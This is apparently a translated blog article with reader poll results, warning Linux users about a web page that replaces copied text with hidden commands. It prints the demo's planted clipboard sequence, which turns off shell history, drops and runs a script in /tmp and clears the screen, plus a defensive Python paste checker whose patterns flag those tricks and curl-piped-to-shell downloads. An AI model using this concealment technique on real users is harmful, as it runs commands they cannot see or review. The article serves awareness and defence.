
Attack on Linux users or how to assemble a botnet with the hands of administrators
For the purity of the experiment, I suggest following the link and performing the “installation of useful packages” according to the instructions given there. The instructions are for Ubuntu users.
The link is merely a "demonstration" of this type of attack, but in any case these actions are best performed on a virtual training ground.
Below is a description of what happened, in case you were not too lazy to perform the above actions.
A small preface: when working from server configuration manuals, one is often too lazy to type all the commands by hand, especially long ones. Also, most terminals do nothing special about pasted line feeds: the shell simply executes the pasted line instantly.
What if, when the user copies code from a page, we replace it so that, once pasted into the console, the commands we need are executed automatically? The only nuance is how to hide the bad code from the user's eyes.
This led to the following idea:
1. We ask the user to raise privileges to root, which is quite logical given that packages are about to be installed.
2. We write a long command, thereby pushing the user to copy it (copy, rather than type it by hand).
3. On copy, the clipboard contents are replaced with the set of commands needed for the attack, namely:
set +o history && echo 'echo you hacked!' > /tmp/test.sh && chmod +x /tmp/test.sh && /tmp/test.sh && printf "\033c" && set -o history
sudo su
apt-get update && apt-get install mc && apt-get install vim && apt-get install htop && apt-get install man
Analysis of the first line:
1. Turn off the history of entered commands
set +o history
2. The actual creation and execution of the malicious code
echo 'echo you hacked!' > /tmp/test.sh && chmod +x /tmp/test.sh && /tmp/test.sh
3. Clearing the terminal screen (clear would also do)
printf "\033c"
4. Turn the history back on
set -o history
The second line re-enters the previously typed command so that it appears in the history.
And the third line is the actual useful code, the package installation the user intended to run.
As a result (depending on the terminal used), when you paste the copied code directly into the console, the unwanted commands are executed without appearing either in the history or on the screen.
If everything went as it should, /tmp/test.sh will contain a “malware” that was executed the moment the code was pasted into the console.
In general, use terminals that warn you about pasting code containing line feeds, and do not mindlessly paste code from unverified sources. For Windows there is ConEmu, which warns when such code is pasted.
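As an added, defensive example (not code from the article or its demo page): a small check that a paste gate or clipboard-manager hook could run over text before it reaches a terminal, flagging the tricks the article relies on (embedded line breaks, history suppression, screen clearing, an executable dropped in /tmp). The clipboard content below is a constructed copy of the demo's planted commands.

```python
import re

# Constructed sample: the three lines the demo page plants in the clipboard.
# Only the last line is what the user believes they copied.
PLANTED_CLIPBOARD = (
    "set +o history && echo 'echo you hacked!' > /tmp/test.sh && chmod +x /tmp/test.sh"
    " && /tmp/test.sh && printf \"\\033c\" && set -o history\n"
    "sudo su\n"
    "apt-get update && apt-get install mc && apt-get install vim"
    " && apt-get install htop && apt-get install man"
)

# Patterns worth flagging before text reaches a shell prompt.
SUSPICIOUS = [
    (re.compile(r"set\s+\+o\s+history|HISTFILE=|unset\s+HISTFILE"), "history disabled"),
    (re.compile(r"printf\s+.?\\033c|\bclear\b|\\x1b|\x1b"), "screen clear / escape sequence"),
    (re.compile(r">\s*/tmp/\S+.*chmod\s+\+x|chmod\s+\+x\s+/tmp/\S+"), "drops an executable in /tmp"),
    (re.compile(r"(curl|wget)\s+.*\|\s*(ba)?sh"), "pipes a download into a shell"),
]


def inspect_paste(text):
    """Return a list of findings for clipboard text about to be pasted into a terminal."""
    findings = []
    # A line break in pasted text makes the shell execute the line(s) before the user can review them.
    if "\n" in text or "\r" in text:
        findings.append("embedded line break: pasted lines execute immediately")
    # Raw control characters (e.g. a literal ESC) can redraw or hide what is on screen.
    if any(ord(c) < 0x20 and c not in "\n\t" for c in text):
        findings.append("raw control characters present")
    for pattern, label in SUSPICIOUS:
        if pattern.search(text):
            findings.append(label)
    return findings


def visible_vs_hidden(text):
    """Split pasted text into the last line (what the user expects to see) and everything before it."""
    lines = text.rstrip("\n").split("\n")
    return lines[-1], lines[:-1]


if __name__ == "__main__":
    for finding in inspect_paste(PLANTED_CLIPBOARD):
        print("WARNING:", finding)
    visible, hidden = visible_vs_hidden(PLANTED_CLIPBOARD)
    print("visible:", visible)
    print("hidden lines:", len(hidden))
```

A complementary mitigation on the shell side is readline's bracketed-paste mode (the `enable-bracketed-paste` variable, available since bash 4.4 and on by default since bash 5.1), which inserts pasted text literally so embedded newlines no longer execute until Enter is pressed.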
PS The above example is just my guess about a possible problem. I have not encountered it in practice.
The article is written only to warn users about this entirely possible attack vector.
UPD Thanks to ValdikSS for the pointer to thejh.net/misc/website-terminal-copy-paste. The example has been updated.
I would also like to hear users' opinions on how real the threat is in practice, and whether you noticed code execution after pasting the copied command into the console.
Have you noticed the execution of "malicious" code after inserting the command into the console?
- 18.6% Yes 119
- 10.5% No 67
- 6.1% The code did not work (if so, I would like to hear in the comments for what reason) 39
- 64.7% Not Tested 413